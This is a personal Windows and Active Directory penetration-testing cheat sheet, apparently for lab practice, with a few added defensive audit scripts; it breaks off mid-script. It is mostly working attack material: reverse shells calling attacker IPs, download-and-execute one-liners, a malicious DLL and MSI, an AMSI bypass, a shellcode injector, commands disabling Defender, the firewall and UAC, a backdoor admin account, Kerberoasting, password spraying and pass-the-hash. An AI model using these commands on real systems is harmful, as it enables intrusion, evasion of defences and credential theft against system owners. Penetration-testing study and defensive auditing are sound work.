GUI - Desktop


  • RDP
  • Remmina (better for transferring files: use “share folder”)
xfreerdp /u:administrator /p:P@$$W0rd /cert:ignore /v:10.10.161.175
xfreerdp /u:admin /p:password /cert:ignore /v:MACHINE_IP /workarea
xfreerdp /u:bob /cert:ignore /v:10.10.189.227
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:$IP /u:administrator /p:'4q6X[redacted]dxs'
xfreerdp /v:IP /d:DOMAIN /u:USER /p:PASS /cert:ignore /auto-reconnect-max-retries:0 +auto-reconnect +clipboard /dynamic-resolution /drive:/usr/share/windows-binaries/,share

Windows Kernel Exploits


https://juggernaut-sec.com/kernel-exploits-part-1/ https://juggernaut-sec.com/kernel-exploits-part-2/

Precompiled kernel exploit binaries: https://github.com/SecWiki/windows-kernel-exploits

Hunting for Kernel Vulnerabilities

Gather information about the hotfixes installed on a host

wmic qfe get Caption,Description,HotFixID,InstalledOn

The bulletin ID of a hotfix includes the year the vulnerability was identified / patched.
For example: MS10-059 (2010), MS17-010 (2017), etc.

Enumerating Kernel Exploits – Tools

Old Windows (< Windows 10)

Windows Exploit Suggester 2 https://github.com/7Ragnarok7/Windows-Exploit-Suggester-2

./windows-exploit-suggester.py --database 2021-04-16-mssb.xls --systeminfo win7.txt | grep "\[M\]\|\[E\]" | grep "Elevation"

Sherlock https://github.com/rasta-mouse/Sherlock

wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1

Modify the script so it runs the scan on load, then execute it from memory on the target:

echo "Find-AllVulns" >> Sherlock.ps1
powershell.exe -nop -exec bypass -c "iex(new-object net.webclient).downloadstring('http://172.16.1.30/Sherlock.ps1')"

We can also use /opt/wesng/wes.py

New Windows (Windows 10 and later)

Watson.exe, Windows OS (10 / 2016 / 2019) https://github.com/Juggernaut-Sec/Windows-Privilege-Escalation/blob/main/Watson.exe


Docs / Tools


Priv escalation https://pentestwiki.org/privilege-escalation-in-windows-and-linux/ Exploit 2016 https://xorond.com/posts/2021/04/windows-local-privilege-escalation/

Reverse shell https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

Manage Users: https://www.windows-commandline.com/cmd-net-user-command/

https://www.daronwolff.com/windows-enumeration-post-explotation/ https://securitytutorials.co.uk/basic-enumeration-on-a-windows-pc/ https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc Command Line fu https://www.windows-commandline.com/?s=domain+controller

https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview

Active Directory

MindMap https://tajdini.net/blog/penetration/active-directory-penetration-mind-map/ MindMap https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg List of helpful commands https://hackerifg.com/active-directory/ https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#dcsync-attack https://0x4rt3mis.github.io/posts/Active-Directory-Commands/ https://www.hackingdream.net/2021/04/active-directory-penetration-testing-cheatsheet.html GPO https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/gpo-abuse

CVE

https://github.com/Al1ex/WindowsElevation https://kakyouim.hatenablog.com/entry/2020/05/27/010807 List of common binaries https://github.com/SecWiki/windows-kernel-exploits

Download binaries https://live.sysinternals.com/ Static binaries: https://github.com/andrew-d/static-binaries https://github.com/Hacker-One/WindowsExploits

lolbas https://lolbas-project.github.io/

Process Explorer (for old Windows) https://eternallybored.org/misc/procexp/

.\winPEASany.exe | tee -filepath C:\Windows\Temp\winpeas.txt
winpeas.exe > outputfile.txt

winPEAS and PowerUp.ps1

powershell.exe -nop -exec bypass
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File


https://infosecwriteups.com/automating-ad-enumeration-with-frameworks-f8c7449563be https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet https://payatu.com/blog/manmeet/ad-enumeration-without-external-scripts https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/


Priv Esc


https://github.com/GhostPack/Seatbelt https://github.com/GhostPack/SharpUp https://github.com/gladiatx0r/Powerless

https://github.com/bitsadmin/wesng https://github.com/carlospolop/winPE/tree/master/binaries/watson

https://www.hackingarticles.in/window-privilege-escalation-automated-script/

Windows Exploit Suggester

python2 /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --update
python2 /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py -i systeminfo.txt -d 2021-11-02-mssb.xls

Search / Find


Search/find an exe file

Get-ChildItem -Path C:\ -Include "*.exe" -File -Recurse -ErrorAction SilentlyContinue

Search/find a file by name (recursive)

dir "\flag.txt*" /s

Search txt files for the word “password”

findstr /si password *.txt

File


icacls job.bat
certutil -urlcache -f http://10.10.16.42/nc.exe c:\windows\temp\nc.exe
echo C:\Windows\Temp\nc.exe -e cmd.exe 10.10.16.42 1234 > C:\Log-Management\job.bat

Config interfaces


Open config console

msconfig

Open computer management

compmgmt.msc

Open users manager

lusrmgr.msc

Open perf manager

perfmon

Open resource monitor

resmon

Open updates viewer

control /name Microsoft.WindowsUpdate

Important Commands


Recursive file listing

dir /a /b /s 
gci -recurse . | select FullName

File size

gci file.txt | select Length

Check file encryption

cipher /c file.txt

List users

net users

List info for user

net user xxx

List shares

net share

Extract all accounts in the Service Principal Name

setspn -T medin -Q */*

Get an overview of the system

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Get processor / OS architecture

echo %PROCESSOR_ARCHITECTURE%

Machine name

echo %computername%

hostname

Add user john to local admin

net localgroup administrators john /add
net localgroup Administrators
whoami /priv

Add user to domain group

net group "Domain Admins" testuser /ADD /DOMAIN

List domain group

net group "Domain Admins"

Check the registry for User Autologon / Winlogon credentials

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

Other users logged in

qwinsta

Query info for a service

sc query windefend
sc queryex type= service

Patch level

wmic qfe get Caption,Description,HotFixID,InstalledOn

List software

wmic product get name,version,vendor

Check firewall status

netsh firewall show stat

Add user local

net user tom Password1 /add

Add host DNS

echo 10.10.21.171 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts

Add user


net user dummy dummy2020 /ADD
net user dummy dummy2020 /ADD /DOMAIN


net localgroup administrators dummy /add

Session


/opt/impacket/examples/psexec.py USER@IP -hashes :NTLMHASH

Powershell


powershell -ep bypass
Get-Content -Path 'C:\Users\dark\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'

Password


List saved credentials (Credential Manager)

cmdkey /list

Try the saved credentials with runas

runas /savecred /user:admin reverse_shell.exe

runas /env /noprofile /savecred /user:administrator "cmd.exe /c whoami > whoami.txt"

runas /env /profile /user:DVR4\Administrator "C:\Users\viewer\nc.exe -e cmd.exe 192.168.49.62 443"

Run as another user using PowerShell

# Build a credential object from the password
$secpasswd = ConvertTo-SecureString "myPass123" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("offsec", $secpasswd)

# Then we can use the password
Start-Process -FilePath powershell.exe -argumentlist "C:\temp\nc.exe 10.11.1.43 -e cmd.exe" -Credential $mycreds
powershell -c "$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('Administrator', $password); Start-Process -FilePath 'shell.exe' -Credential $creds"
echo "copy C:\Users\maria\file C:\programdata\file" > cmd.ps1
Set-DomainObject -Identity maria -SET @{scriptpath="C:\\programdata\\cmd.ps1"}
psexec.exe /accepteula -c nc.exe -e cmd.exe 192.168.49.91 445

Check registry keys for passwords

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

DLL Hijacking


Malicious DLL

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("net user tom Password1");
        system("cmd.exe /k whoami > C:\\Temp\\clobee_was_here.txt");
        ExitProcess(0);
    }
    return TRUE;
}

Install the MinGW cross compiler

apt install gcc-mingw-w64-x86-64

The mingw compiler can be used to generate the DLL file with the command given below:

x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll

Download the malicious DLL onto the victim

wget -O hijackme.dll ATTACKBOX_IP:PORT/hijackme.dll

We will have to stop and start the dllsvc service again using the command below:

sc stop dllsvc & sc start dllsvc

Unquoted Service Path Vulnerabilities


  • Can you write to a folder on the path?
  • Are you able to restart the service?

Note: The WMIC tool is deprecated in Windows 10, version 21H1. Windows PowerShell supersedes this tool for WMI.

List services running on the target system

wmic service get name,displayname,pathname,startmode

List non-standard (abnormal) services, i.e. those not under C:\Windows

wmic service get name,displayname,pathname,startmode | findstr /i /v "c:\windows"

List non-standard (abnormal) services with auto start mode

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

List unquoted services

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
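The findstr chains above filter the service list on the live host. As an added example that is not part of these notes, the Python below performs the same audit offline over saved wmic output: it keeps unquoted binary paths containing a space outside C:\Windows (optionally only Auto-start services), and for each one lists the directories whose write permissions need checking (the accesschk step below). The service names and paths in the sample are constructed.

```python
import re

# Constructed sample in the fixed-width layout that
# `wmic service get name,displayname,pathname,startmode` prints.
# Service names and paths are made up for this example.
def _row(name, display, path, mode):
    return f"{name:<14}{display:<28}{path:<80}{mode}"

SAMPLE_WMIC = "\n".join([
    _row("Name", "DisplayName", "PathName", "StartMode"),
    _row("Spooler", "Print Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    _row("unquotedsvc", "Unquoted Path Service",
         r"C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe", "Auto"),
    _row("dllsvc", "DLL Hijack Service",
         r'"C:\Program Files\DLL Hijack Service\dllhijackservice.exe"', "Manual"),
    _row("daclsvc", "DACL Service", r"C:\Program Files\DACL Service\daclservice.exe", "Manual"),
    _row("netsvc", "Vendor Network Agent", r"C:\Vendor App\agent.exe --service", "Auto"),
])

EXE_RE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)


def parse_wmic_table(text):
    """Split wmic's fixed-width table into dicts using the header's column offsets."""
    lines = [l.rstrip() for l in text.splitlines() if l.strip()]
    cols = [(m.group(0), m.start()) for m in re.finditer(r"\S+", lines[0])]
    rows = []
    for line in lines[1:]:
        row = {}
        for i, (name, start) in enumerate(cols):
            end = cols[i + 1][1] if i + 1 < len(cols) else None
            row[name] = line[start:end].strip()
        rows.append(row)
    return rows


def find_unquoted_services(text, only_auto=True):
    """Services whose unquoted binary path contains a space, outside C:\\Windows.

    For each finding, dirs_to_check lists the directories Windows would search
    for a truncated executable name (C:\\Program.exe, ...); those are the
    directories whose write permissions must be verified (e.g. with accesschk).
    """
    findings = []
    for svc in parse_wmic_table(text):
        path = svc.get("PathName", "")
        if not path or path.startswith('"'):
            continue  # quoted paths are not affected
        m = EXE_RE.match(path)
        exe = m.group(1) if m else path.split(" ")[0]
        if " " not in exe or exe.lower().startswith("c:\\windows"):
            continue
        if only_auto and svc.get("StartMode", "").lower() != "auto":
            continue
        dirs = []
        for idx, ch in enumerate(exe):
            if ch == " ":
                parent = exe[:idx].rsplit("\\", 1)[0] + "\\"
                if parent not in dirs:
                    dirs.append(parent)
        findings.append({"name": svc["Name"], "exe": exe,
                         "start": svc["StartMode"], "dirs_to_check": dirs})
    return findings


if __name__ == "__main__":
    for f in find_unquoted_services(SAMPLE_WMIC):
        print(f"{f['name']} ({f['start']}): {f['exe']}")
        for d in f["dirs_to_check"]:
            print("    check write access on:", d)
```

Feed it the real output with `wmic service get name,displayname,pathname,startmode > services.txt` and `find_unquoted_services(open("services.txt").read())`; column offsets are taken from the header line, so the parser does not depend on wmic's column widths.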

Check privileges

.\accesschk64.exe /accepteula -uwdq "C:\Program Files\"

Check binary path of a service

sc qc unquotedsvc

Generate a reverse shell exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.10.49.211 LPORT=LOCAL_PORT -f exe > reverse_shell.exe

Restart the service

sc start unquotedsvc

Scheduled Tasks


Query scheduled tasks.

schtasks /query /fo LIST /v
schtasks /query /tn vulntask /fo list /v

Review permissions

icacls c:\tasks\schtask.bat

Query the registry for AlwaysInstallElevated (both keys should be set)

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Generate a malicious .msi

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.10.49.211 LPORT=LOCAL_PORT -f msi -o malicious.msi

Open a listener on the attack box and transfer the .msi to the victim

Run the malicious .msi

C:\>msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Active Directory


Find out whether a user can log in over WinRM

crackmapexec winrm -u tess -p Password123 --continue-on-success 172.16.2.3
evil-winrm -i 172.16.2.3 -u tess -p Password123 -s '/usr/share/windows-resources/powersploit/Recon/'

Find cpassword entries in Group Policy Preferences (SYSVOL)

findstr /S /I cpassword \\blabla.local\sysvol\blabla.local\policies\*.xml

Domain metadata enumeration (LDAP root DSE, no credentials)

ldapsearch -LLL -x -H ldap://dc01.lab.ropnop.com -b '' -s base '(objectclass=*)'

Bloodhound


Clear Neo4j database

rm -rf data/graph.db

BloodHound Installation

apt-get install bloodhound

start

neo4j console

with default credentials -> neo4j:neo4j (or abc)

Getting loot w/ SharpHound

powershell -ep bypass #same as with PowerView
. .\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip

Copy the loot.zip in Kali and import it in bloodhound for analysis!

run

bloodhound

run via python

bloodhound.py -d test.local -v --zip -c All -dc test.local -ns 10.10.10.1

Kerberos


https://github.com/ropnop/kerbrute/releases https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

Enumerating Users w/ Kerbrute against the Domain Controller

kerbrute userenum --dc 172.31.3.9 -d domainName.csl /opt/Seclists/Usernames/xato-net-10-million-usernames.txt

Then confirm the users by brute force (trying each username as its own password)

crackmapexec smb 172.31.3.9 -u users.txt -p users.txt --continue-on-success

Then use WinRM https://github.com/Hackplayers/evil-winrm

evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]

Other tools to consider

SharpGPOAbuse

Harvest TGTs every 30 seconds

Rubeus.exe harvest /interval:30

Take a given password and “spray” it against all found users, then return the .kirbi TGT for each user it works for

Rubeus.exe brute /password:Password1 /noticket

Kerberoast


Extract all accounts in the SPN (Service Principal Name)

setspn -T medin -Q */*

Get Powershell Invoke-Kerberoast script.

iex(New-Object Net.WebClient).DownloadString('http://10.11.21.99/Invoke-Kerberoast.ps1')
powershell -c wget "https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1" -outfile "C:\Windows\System32\spool\drivers\color\Invoke-Kerberoast.ps1"

Locate Invoke-Kerberoast on Kali

locate Kerberoast
/usr/share/powershell-empire/data/module_source/credentials/Invoke-Kerberoast.ps1

Once the script is loaded into memory, run it:

Invoke-Kerberoast -OutputFormat hashcat | fl

You should get a service ticket hash for each SPN account, which you can crack:

hashcat -m 13100 -a 0 hash.txt wordlist --force

Privilege escalation (with powerup)

iex​(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1')

Kerberoasting w/ Rubeus


1.) cd Downloads - navigate to the directory Rubeus is in

2.) Rubeus.exe kerberoast - this will dump the Kerberos hash of any kerberoastable users

Copy the hash onto your attacker machine and put it into a .txt file so we can crack it with hashcat

I have created a modified rockyou wordlist in order to speed up the process; download it here

3.) hashcat -m 13100 -a 0 hash.txt Pass.txt - now crack that hash

Method 2 - Impacket

Impacket Installation -

Impacket releases have been unstable since 0.9.20; I suggest getting an installation of Impacket < 0.9.20

1.) cd /opt - navigate to your preferred directory to save tools in

2.) download the precompiled package from https://github.com/SecureAuthCorp/impacket/releases/tag/impacket_0_9_19

3.) cd Impacket-0.9.19 navigate to the impacket directory

4.) pip install . - this will install all needed dependencies

Kerberoasting w/ Impacket -

1.) cd /usr/share/doc/python3-impacket/examples/ - navigate to where GetUserSPNs.py is located

2.) sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.147.217 -request - this will dump the Kerberos hash for all kerberoastable accounts it can find on the target domain, just like Rubeus does; however, this does not have to run on the target machine and can be done remotely.

3.) hashcat -m 13100 -a 0 hash.txt Pass.txt - now crack that hash


NTLM theft


  • Start responder
  • then generate ntlm_theft files
  • When a user views the files in the share, the NTLM hash is captured by Responder

Method 2:

  • Start responder
  • LFI on a Windows victim: make it open the UNC path \\KALI_IP\@fake

Method 3 (MSSQL sqli):

  • Start Responder
  • Visit
    domain.com?id='; exec master..xp_dirtree '\\KALI_IP\@fake.png',11;--
    

PS: MySQL is also vulnerable

Method 4:


Snmpwalk


Scanning for SNMP

sudo nmap -sU --open -p 161 10.11.1.1-254 -oG open-snmp.txt
onesixtyone -c community -i ips.txt

Enumerating the Entire MIB Tree

snmpwalk -c public -v1 -t 10 10.11.1.14

Enumerating Windows Users

snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25

Enumerating Running Windows Processes

snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2

Enumerating Open TCP Ports

snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.6.13.1.3

Enumerating Installed Software

snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2

Potato-style token attacks: privileges to look for in whoami /priv (any of these)


SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege
SeTcbPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
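As an added example (not part of these notes), the script below parses saved `whoami /priv` output and reports which of the privileges listed above the token holds. It treats a Disabled privilege as a finding too, because a privilege that is present but disabled can be enabled by the process itself; for a defender this is the check to run against service accounts and application-pool identities. The sample output is constructed.

```python
import re

# Privileges from the list above that allow token manipulation, impersonation,
# driver loading or debugging. SeAssignPrimaryTokenPrivilege is the full name of
# the "SeAssignPrimary" entry.
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeTcbPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeCreateTokenPrivilege",
    "SeLoadDriverPrivilege", "SeTakeOwnershipPrivilege", "SeDebugPrivilege",
}

# One row of the `whoami /priv` table: name, description, state.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")

# Constructed sample of `whoami /priv` output for a service account.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeBackupPrivilege             Back up files and directories             Disabled
"""


def parse_whoami_priv(text):
    """Return {privilege_name: state} from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def audit_privileges(text):
    """High-risk privileges held by the token, as sorted (name, state) pairs.

    A Disabled privilege is still held: the process can turn it on with
    AdjustTokenPrivileges, so it is reported alongside Enabled ones.
    """
    privs = parse_whoami_priv(text)
    return sorted((name, state) for name, state in privs.items()
                  if name in HIGH_RISK_PRIVILEGES)


if __name__ == "__main__":
    for name, state in audit_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name}: {state}")
```

Run `whoami /priv > privs.txt` in the context you want to assess and pass the file contents to `audit_privileges`; an empty list means none of the listed privileges is held.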

Local Network Attacks: LLMNR and NBT-NS Poisoning


https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning/

Respond to LLMNR requests and capture user credentials

python Responder.py -I eth0 -wfv

The Responder program stores the credentials in a file in the local directory called SMB-NTLMv2-Client-192.168.1.74.txt

These should then be fed to john or hashcat.


Password Enumeration


Search the word “password” in text files

findstr /si password *.txt *.ini *.config

Searching passwords in the registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K 
REG QUERY HKCU /F "password" /t REG_SZ /S /K

Passwords in unattend files

C:\unattend.xml 
C:\Windows\Panther\Unattend.xml 
C:\Windows\Panther\Unattend\Unattend.xml 
C:\Windows\system32\sysprep.inf 
C:\Windows\system32\sysprep\sysprep.xml

Interesting files


Check history file

%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

User passwords are stored base64-encoded in

C:\Windows\Panther\Unattend\Unattended.xml
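As an added example that is not part of these notes: a scanner for credentials left behind in unattend / sysprep answer files, the hygiene check to run on images before deployment. It walks every Password and AdministratorPassword element, honours the PlainText flag, and for base64 values reverses the encoding Windows Setup documents for these elements (element name appended to the password, UTF-16LE, then base64). The sample XML, account names and passwords are constructed.

```python
import base64
import xml.etree.ElementTree as ET


def _encode(password, element_name):
    """Encode a password the way Windows Setup does when PlainText is false."""
    return base64.b64encode((password + element_name).encode("utf-16-le")).decode("ascii")


# Constructed sample unattend.xml with one auto-logon password, one local
# Administrator password (both base64) and one plaintext local account.
SAMPLE_UNATTEND = f"""<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64">
      <AutoLogon>
        <Password>
          <Value>{_encode("P@ssw0rd", "Password")}</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>{_encode("Adm1n!", "AdministratorPassword")}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Password>
              <Value>Plain123</Value>
              <PlainText>true</PlainText>
            </Password>
            <Name>svc_build</Name>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

PASSWORD_ELEMENTS = {"Password", "AdministratorPassword"}


def _local(tag):
    """Strip the XML namespace from a tag name."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name):
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return None


def find_unattend_credentials(xml_text):
    """Return [(element_name, account, password)] for every credential in the file."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    found = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name not in PASSWORD_ELEMENTS:
            continue
        value = _child_text(elem, "Value")
        if not value:
            continue
        plain = (_child_text(elem, "PlainText") or "false").lower() == "true"
        if plain:
            password = value
        else:
            password = base64.b64decode(value).decode("utf-16-le")
            if password.endswith(name):          # drop the appended element name
                password = password[: -len(name)]
        parent = parents.get(elem)
        account = (_child_text(parent, "Username") or _child_text(parent, "Name")
                   or ("Administrator" if name == "AdministratorPassword" else None))
        found.append((name, account, password))
    return found


if __name__ == "__main__":
    for element, account, password in find_unattend_credentials(SAMPLE_UNATTEND):
        print(f"{element} for {account}: {'*' * len(password)} (leftover credential)")
```

Point it at the paths listed above (`find_unattend_credentials(open(path, encoding="utf-8").read())`); any result means the file still carries a credential that should be rotated and the file removed from the image.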

Evade / Evasion / bypass


Generate an encoded payload

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=192.168.119.203 LPORT=443 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f c

Encoded powershell

powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1
powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1

AV bypass with OpenSSL encryption

openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
#Start HTTP server
sudo python -m SimpleHTTPServer 80 
#Download from the victim
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh 

AV bypass with Base64 encoding

base64 -w0 linpeas.sh > lp.enc
#Start HTTP server
sudo python -m SimpleHTTPServer 80
#Download from the victim
curl 10.10.10.10/lp.enc | base64 -d | sh 

With default AppLocker rules, bypass by placing the executable in one of the following directories:

C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\Tasks
C:\windows\tracing

Bypassing UAC: https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html

Invoke-BypassUAC -Command 'C:\Users\ted\Desktop\rev_shell.exe'

Scripts: Invoke-EventVwrBypass.ps1 or Invoke-BypassUAC.ps1 https://github.com/CsEnox/EventViewer-UACBypass

In order to change the admin user’s password, we must switch to a high integrity level even if we are logged in as an administrative user

powershell.exe Start-Process cmd.exe -Verb runAs

Turn off / Disable UAC

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Turn off / Disable Firewall

netsh advfirewall set allprofiles state off

Show current firewall profile

netsh advfirewall show currentprofile

netsh advfirewall firewall show rule name=all

Disable Windows Defender (WinDefend) using PowerShell (as an administrator)

Set-MpPreference -DisableRealtimeMonitoring $true
sc config WinDefend start= disabled
sc stop WinDefend

Do we have a supported way to test AMSI is enabled and working?

You may use the following commands to test SEP AMSI and command line scan components:

powershell -command "& {write-output 'Am I evil? Yes I am!!'}"

Will be detected only if registry value AMSIEnabled = 1 or is absent

cmd /C ECHO Am I evil? Yes I am!!

Will be detected only if reg value CommandLineScanEnabled = 1 or is absent

Bypass AMSI

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)

In memory injection

$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$winFunc = 
  Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;

[Byte[]];
[Byte[]]$sc = <place your shellcode here>;

$size = 0x1000;

if ($sc.Length -gt 0x1000) {$size = $sc.Length};

$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};

$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };

We can use the following msfvenom command to generate the shellcode for the script above

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f powershell

Persistence


Turning off server security controls

# Turn off firewall for all networks
netsh advfirewall set allprofiles state off

# Show current firewall profile
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

# Disable UAC
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

# Disable winDefend
# Using PowerShell (as an administrator)
Set-MpPreference -DisableRealtimeMonitoring $true
sc config WinDefend start= disabled
sc stop WinDefend

Enable RDP

# Enable Local Account Token
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

powershell -ep bypass Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

netsh advfirewall firewall add rule name="Open Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

netsh advfirewall firewall set rule group="remote desktop" new enable=yes

netsh advfirewall firewall add rule name="tcp-3389" dir=in action=allow protocol=TCP localport=3389

netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389

Add user hacker/dummy

#Add backdoor user hacker / hacker123 as admin
net user hacker hacker123 /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /add

Passing the Hash (pth)


pth-winexe -U offsec%hash:hash //10.11.0.22 cmd

icacls


We can run icacls, passing the full path of the service binary as an argument. The command output enumerates the associated permissions:

icacls "C:\Program Files\Serviio\bin\ServiioService.exe"

F  : Full access
M  : Modify access
RX : Read and execute access
R  : Read-only access
W  : Write-only access
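As an added example (not part of these notes), the parser below reads saved icacls output for a service binary and flags ACEs that give a low-privileged principal (Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE) the F, M or W rights from the legend above, or their specific-rights spellings (WD, AD, WA, WDAC, WO). Such an ACE means any local user can replace the binary that runs as the service account, which is what a defender auditing service permissions is looking for. The sample path and output are constructed.

```python
import re

# Principals every local user belongs to (compared case-insensitively).
LOW_PRIV_PRINCIPALS = {
    "everyone", r"builtin\users", r"nt authority\authenticated users",
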